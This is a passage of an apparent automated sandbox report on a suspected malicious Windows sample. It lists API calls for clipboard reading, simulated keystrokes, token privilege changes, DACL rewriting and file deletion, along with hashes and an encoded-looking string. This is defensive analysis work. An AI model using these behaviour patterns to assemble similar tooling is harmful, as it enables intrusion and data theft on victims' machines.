                                            • GetWindowLongW.USER32(?,000000F0), ref: 0087004B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                            • String ID: @GUI_DRAGID$F
                                            • API String ID: 2516578528-4164748364
                                            • Opcode ID: 0ff628aeaa37b0d8ba66c2fbc303e9cd78ec475907f398210682b837b5df27f2
                                            • Instruction ID: ff0b3667b0bb952bfbd349add2b3731d28bfc3b370304bde23062725213a3348
                                            • Opcode Fuzzy Hash: 0ff628aeaa37b0d8ba66c2fbc303e9cd78ec475907f398210682b837b5df27f2
                                            • Instruction Fuzzy Hash: 0032A970604345AFDB20CF68D884FAABBA9FF49358F050669F699C72A2D731DC50CB52
                                            APIs
                                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0086B1CD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: %d/%02d/%02d
                                            • API String ID: 3850602802-328681919
                                            • Opcode ID: f58bb012d5e096389af7a4a7e5a66f40b44d21e54bc2166d800fbedee3e8ffac
                                            • Instruction ID: 1719dde87502277fd524a7c72157e9e8c5fcd5b6febe9a4020c1e0c9df6b6d0b
                                            • Opcode Fuzzy Hash: f58bb012d5e096389af7a4a7e5a66f40b44d21e54bc2166d800fbedee3e8ffac
                                            • Instruction Fuzzy Hash: 0012CEB1500248ABEB289F68CC49FAE7BB8FF45314F114119FA15EB2D1DB748981CF52
                                            APIs
                                            • GetForegroundWindow.USER32(00000000,00000000), ref: 0081EB4A
                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00873AEA
                                            • IsIconic.USER32(000000FF), ref: 00873AF3
                                            • ShowWindow.USER32(000000FF,00000009), ref: 00873B00
                                            • SetForegroundWindow.USER32(000000FF), ref: 00873B0A
                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00873B20
                                            • GetCurrentThreadId.KERNEL32 ref: 00873B27
                                            • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00873B33
                                            • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00873B44
                                            • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00873B4C
                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00873B54
                                            • SetForegroundWindow.USER32(000000FF), ref: 00873B57
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00873B6C
                                            • keybd_event.USER32(00000012,00000000), ref: 00873B77
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00873B81
                                            • keybd_event.USER32(00000012,00000000), ref: 00873B86
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00873B8F
                                            • keybd_event.USER32(00000012,00000000), ref: 00873B94
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00873B9E
                                            • keybd_event.USER32(00000012,00000000), ref: 00873BA3
                                            • SetForegroundWindow.USER32(000000FF), ref: 00873BA6
                                            • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00873BCD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                            • String ID: Shell_TrayWnd
                                            • API String ID: 4125248594-2988720461
                                            • Opcode ID: e039ccd5bb9e23fe03571cce1a0473d9c5cb3e02e7f75d3fc2c71a246f5a7955
                                            • Instruction ID: e4944bda1db1ad38caedbbc62b791117e8f898e1cffd3d199cbe62e679ceaed7
                                            • Opcode Fuzzy Hash: e039ccd5bb9e23fe03571cce1a0473d9c5cb3e02e7f75d3fc2c71a246f5a7955
                                            • Instruction Fuzzy Hash: D8318871A4031C7BEB206B659C4AF7F7F6CFB44B64F104016FA05EA1D1D6B19D01ABA1
                                            APIs
                                              • Part of subcall function 0083B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0083B180
                                              • Part of subcall function 0083B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0083B1AD
                                              • Part of subcall function 0083B134: GetLastError.KERNEL32 ref: 0083B1BA
                                            • _memset.LIBCMT ref: 0083AD08
                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0083AD5A
                                            • CloseHandle.KERNEL32(?), ref: 0083AD6B
                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0083AD82
                                            • GetProcessWindowStation.USER32 ref: 0083AD9B
                                            • SetProcessWindowStation.USER32(00000000), ref: 0083ADA5
                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0083ADBF
                                              • Part of subcall function 0083AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0083ACC0), ref: 0083AB99
                                              • Part of subcall function 0083AB84: CloseHandle.KERNEL32(?,?,0083ACC0), ref: 0083ABAB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                            • String ID: $default$winsta0
                                            • API String ID: 2063423040-1027155976
                                            • Opcode ID: 26a4a77f2b61059ea53374ca44103af42052a58042f43d2060b08d2da42194d6
                                            • Instruction ID: eb93b825b7e2c5544a4835dda69573357d1ed910b3964e2b901f4bdc2e373d16
                                            • Opcode Fuzzy Hash: 26a4a77f2b61059ea53374ca44103af42052a58042f43d2060b08d2da42194d6
                                            • Instruction Fuzzy Hash: 3D818CB1800249AFDF15DFA8DC49AEEBB79FF44304F044119F964E21A1EB358E54DBA2
                                            APIs
                                              • Part of subcall function 00846EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00845FA6,?), ref: 00846ED8
                                              • Part of subcall function 00846EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00845FA6,?), ref: 00846EF1
                                              • Part of subcall function 0084725E: __wsplitpath.LIBCMT ref: 0084727B
                                              • Part of subcall function 0084725E: __wsplitpath.LIBCMT ref: 0084728E
                                              • Part of subcall function 008472CB: GetFileAttributesW.KERNEL32(?,00846019), ref: 008472CC
                                            • _wcscat.LIBCMT ref: 00846149
                                            • _wcscat.LIBCMT ref: 00846167
                                            • __wsplitpath.LIBCMT ref: 0084618E
                                            • FindFirstFileW.KERNEL32(?,?), ref: 008461A4
                                            • _wcscpy.LIBCMT ref: 00846209
                                            • _wcscat.LIBCMT ref: 0084621C
                                            • _wcscat.LIBCMT ref: 0084622F
                                            • lstrcmpiW.KERNEL32(?,?), ref: 0084625D
                                            • DeleteFileW.KERNEL32(?), ref: 0084626E
                                            • MoveFileW.KERNEL32(?,?), ref: 00846289
                                            • MoveFileW.KERNEL32(?,?), ref: 00846298
                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 008462AD
                                            • DeleteFileW.KERNEL32(?), ref: 008462BE
                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 008462E1
                                            • FindClose.KERNEL32(00000000), ref: 008462FD
                                            • FindClose.KERNEL32(00000000), ref: 0084630B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                            • String ID: \*.*$p1Wu`KXu
                                            • API String ID: 1917200108-2866000061
                                            • Opcode ID: c1054b8fa9595253e297f850ce9b4049f5bb015fb2911ce9909a42d2addd27d6
                                            • Instruction ID: 35509d3906ea8aad295c6e9fd7a1d4cc1c7dbd0eb11aacc28746bfc4fb0a089e
                                            • Opcode Fuzzy Hash: c1054b8fa9595253e297f850ce9b4049f5bb015fb2911ce9909a42d2addd27d6
                                            • Instruction Fuzzy Hash: F55100B280822C6ACB21EB95DC44DDBB7BCFF05310F0501E6E545E2141EF7697898FA6
                                            APIs
                                            • OpenClipboard.USER32(0089DC00), ref: 00856B36
                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00856B44
                                            • GetClipboardData.USER32(0000000D), ref: 00856B4C
                                            • CloseClipboard.USER32 ref: 00856B58
                                            • GlobalLock.KERNEL32(00000000), ref: 00856B74
                                            • CloseClipboard.USER32 ref: 00856B7E
                                            • GlobalUnlock.KERNEL32(00000000), ref: 00856B93
                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 00856BA0
                                            • GetClipboardData.USER32(00000001), ref: 00856BA8
                                            • GlobalLock.KERNEL32(00000000), ref: 00856BB5
                                            • GlobalUnlock.KERNEL32(00000000), ref: 00856BE9
                                            • CloseClipboard.USER32 ref: 00856CF6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                            • String ID:
                                            • API String ID: 3222323430-0
                                            • Opcode ID: a630b721f3d77163be71bac6ec2efc8c218830760ad7ca4fe9f0678f184efc83
                                            • Instruction ID: e7b7f3928722fb1b96f3751907ae4d77b50290280764d1a51637b063066abb68
                                            • Opcode Fuzzy Hash: a630b721f3d77163be71bac6ec2efc8c218830760ad7ca4fe9f0678f184efc83
                                            • Instruction Fuzzy Hash: 2A518E71200305ABD310EF68DD96F6E77A8FF94B22F400129F956D71D1EF60E8098B62
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?), ref: 0084F62B
                                            • FindClose.KERNEL32(00000000), ref: 0084F67F
                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0084F6A4
                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0084F6BB
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0084F6E2
                                            • __swprintf.LIBCMT ref: 0084F72E
                                            • __swprintf.LIBCMT ref: 0084F767
                                            • __swprintf.LIBCMT ref: 0084F7BB
                                              • Part of subcall function 0082172B: __woutput_l.LIBCMT ref: 00821784
                                            • __swprintf.LIBCMT ref: 0084F809
                                            • __swprintf.LIBCMT ref: 0084F858
                                            • __swprintf.LIBCMT ref: 0084F8A7
                                            • __swprintf.LIBCMT ref: 0084F8F6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                            • API String ID: 835046349-2428617273
                                            • Opcode ID: 86c43eb4a9d0dfbd138682996df34ab4140f7cd03095ba87677d30dad5eb7fde
                                            • Instruction ID: e94230167903362bf76487d2b0a1d63a1d96f0190d2610db945082e1ce41770e
                                            • Opcode Fuzzy Hash: 86c43eb4a9d0dfbd138682996df34ab4140f7cd03095ba87677d30dad5eb7fde
                                            • Instruction Fuzzy Hash: A7A1FDB2404344ABC750EBA8CC95DAFB7ECFF98704F44492EB595C2192EB34D949CB62
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00851B50
                                            • _wcscmp.LIBCMT ref: 00851B65
                                            • _wcscmp.LIBCMT ref: 00851B7C
                                            • GetFileAttributesW.KERNEL32(?), ref: 00851B8E
                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00851BA8
                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00851BC0
                                            • FindClose.KERNEL32(00000000), ref: 00851BCB
                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00851BE7
                                            • _wcscmp.LIBCMT ref: 00851C0E
                                            • _wcscmp.LIBCMT ref: 00851C25
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00851C37
                                            • SetCurrentDirectoryW.KERNEL32(008B39FC), ref: 00851C55
                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00851C5F
                                            • FindClose.KERNEL32(00000000), ref: 00851C6C
                                            • FindClose.KERNEL32(00000000), ref: 00851C7C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                            • String ID: *.*
                                            • API String ID: 1803514871-438819550
                                            • Opcode ID: ae1a6b1d8c2b227d874deae13170c8eb02c60b4c1be64b9f1aa249973104c383
                                            • Instruction ID: f9f7f1f4472edd8a305599cd32fcba02d30ca12bd3d63aaf2e64ad9b38e12096
                                            • Opcode Fuzzy Hash: ae1a6b1d8c2b227d874deae13170c8eb02c60b4c1be64b9f1aa249973104c383
                                            • Instruction Fuzzy Hash: D03180326403196BDF10ABA8AC8DBDE77ACFF45321F104195EC11E2190EB75DE898B64
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00851CAB
                                            • _wcscmp.LIBCMT ref: 00851CC0
                                            • _wcscmp.LIBCMT ref: 00851CD7
                                              • Part of subcall function 00846BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00846BEF
                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00851D06
                                            • FindClose.KERNEL32(00000000), ref: 00851D11
                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00851D2D
                                            • _wcscmp.LIBCMT ref: 00851D54
                                            • _wcscmp.LIBCMT ref: 00851D6B
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00851D7D
                                            • SetCurrentDirectoryW.KERNEL32(008B39FC), ref: 00851D9B
                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00851DA5
                                            • FindClose.KERNEL32(00000000), ref: 00851DB2
                                            • FindClose.KERNEL32(00000000), ref: 00851DC2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                            • String ID: *.*
                                            • API String ID: 1824444939-438819550
                                            • Opcode ID: 97ce8e58bd69c3d0e51b7414912ba85d3bd1033101a8b34db71ed07f57cc69e2
                                            • Instruction ID: 39397ae77a46dce7162fb74582449fe4368f2fbf531f9ed3465888815745945e
                                            • Opcode Fuzzy Hash: 97ce8e58bd69c3d0e51b7414912ba85d3bd1033101a8b34db71ed07f57cc69e2
                                            • Instruction Fuzzy Hash: 7731D23650061A6ACF10ABA8EC4DBEE77BDFF45325F140591EC11E21D0DB74DE898B64
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _memset
                                            • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                            • API String ID: 2102423945-2023335898
                                            • Opcode ID: 9782d93247f61e28fedc4ad295fec00dff6b99aee414e253f21c248669ba9f26
                                            • Instruction ID: 6da8cd962f1f119d345738ced013f761162c314ae144ce43f1b7fc54cfd4adc5
                                            • Opcode Fuzzy Hash: 9782d93247f61e28fedc4ad295fec00dff6b99aee414e253f21c248669ba9f26
                                            • Instruction Fuzzy Hash: DC82BF71D04219CBCB64CF98C8807ADBBB1FF48324F258169D959EB396E734AD85CB90
                                            APIs
                                            • GetLocalTime.KERNEL32(?), ref: 008509DF
                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 008509EF
                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008509FB
                                            • __wsplitpath.LIBCMT ref: 00850A59
                                            • _wcscat.LIBCMT ref: 00850A71
                                            • _wcscat.LIBCMT ref: 00850A83
                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00850A98
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00850AAC
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00850ADE
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00850AFF
                                            • _wcscpy.LIBCMT ref: 00850B0B
                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00850B4A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                            • String ID: *.*
                                            • API String ID: 3566783562-438819550
                                            • Opcode ID: 37224bedf6cbc4ffb8e67c85b89ea0e6f8d75328e2609de4cb5f7193e2087a88
                                            • Instruction ID: f84c29a73c11edd62662972b84ddd6ecbb10432b7a42e88ea5631bf423e5acad
                                            • Opcode Fuzzy Hash: 37224bedf6cbc4ffb8e67c85b89ea0e6f8d75328e2609de4cb5f7193e2087a88
                                            • Instruction Fuzzy Hash: 49616A725043059FDB10EF64C88599EB3E9FF89324F04891AF989C7252EB31E949CF92
                                            APIs
                                              • Part of subcall function 0083ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0083ABD7
                                              • Part of subcall function 0083ABBB: GetLastError.KERNEL32(?,0083A69F,?,?,?), ref: 0083ABE1
                                              • Part of subcall function 0083ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0083A69F,?,?,?), ref: 0083ABF0
                                              • Part of subcall function 0083ABBB: HeapAlloc.KERNEL32(00000000,?,0083A69F,?,?,?), ref: 0083ABF7
                                              • Part of subcall function 0083ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0083AC0E
                                              • Part of subcall function 0083AC56: GetProcessHeap.KERNEL32(00000008,0083A6B5,00000000,00000000,?,0083A6B5,?), ref: 0083AC62
                                              • Part of subcall function 0083AC56: HeapAlloc.KERNEL32(00000000,?,0083A6B5,?), ref: 0083AC69
                                              • Part of subcall function 0083AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0083A6B5,?), ref: 0083AC7A
                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0083A6D0
                                            • _memset.LIBCMT ref: 0083A6E5
                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0083A704
                                            • GetLengthSid.ADVAPI32(?), ref: 0083A715
                                            • GetAce.ADVAPI32(?,00000000,?), ref: 0083A752
                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0083A76E
                                            • GetLengthSid.ADVAPI32(?), ref: 0083A78B
                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0083A79A
                                            • HeapAlloc.KERNEL32(00000000), ref: 0083A7A1
                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0083A7C2
                                            • CopySid.ADVAPI32(00000000), ref: 0083A7C9
                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0083A7FA
                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0083A820
                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0083A834
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                            • String ID:
                                            • API String ID: 3996160137-0
                                            • Opcode ID: 8194d5f2f06750c893e5558aeba2ab4159a7789b4c7f21ebef2b48f332d9dec1
                                            • Instruction ID: 5f2e59d6fd98ea608933b854045f097ff8171b3d3ddf8184d118fd53a58eeb9f
                                            • Opcode Fuzzy Hash: 8194d5f2f06750c893e5558aeba2ab4159a7789b4c7f21ebef2b48f332d9dec1
                                            • Instruction Fuzzy Hash: BB515B71900209ABDF14DFA5DC85EEEBBB9FF44710F048129F951EB290DB359A06CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$aqg5cvv9aqg55vv9aqg52vv9aqg5fvv9aqg5fvv9aqg55vv9aqg55vv9aqg51vv9aqg5cvv9aqg58vv9aqg55vv9aqg5cvv9aqg50vv9aqg57vv9aqg5
                                            • API String ID: 0-2773958091
                                            • Opcode ID: 65f034d5573f6280cb1c9ce0be97c715652625ae2a6a7ded29d840daa956a36a
                                            • Instruction ID: d72d30a1dc5241b4c68f4130ed25286270044c239ba0654dd60b34f4abc50305
                                            • Opcode Fuzzy Hash: 65f034d5573f6280cb1c9ce0be97c715652625ae2a6a7ded29d840daa956a36a
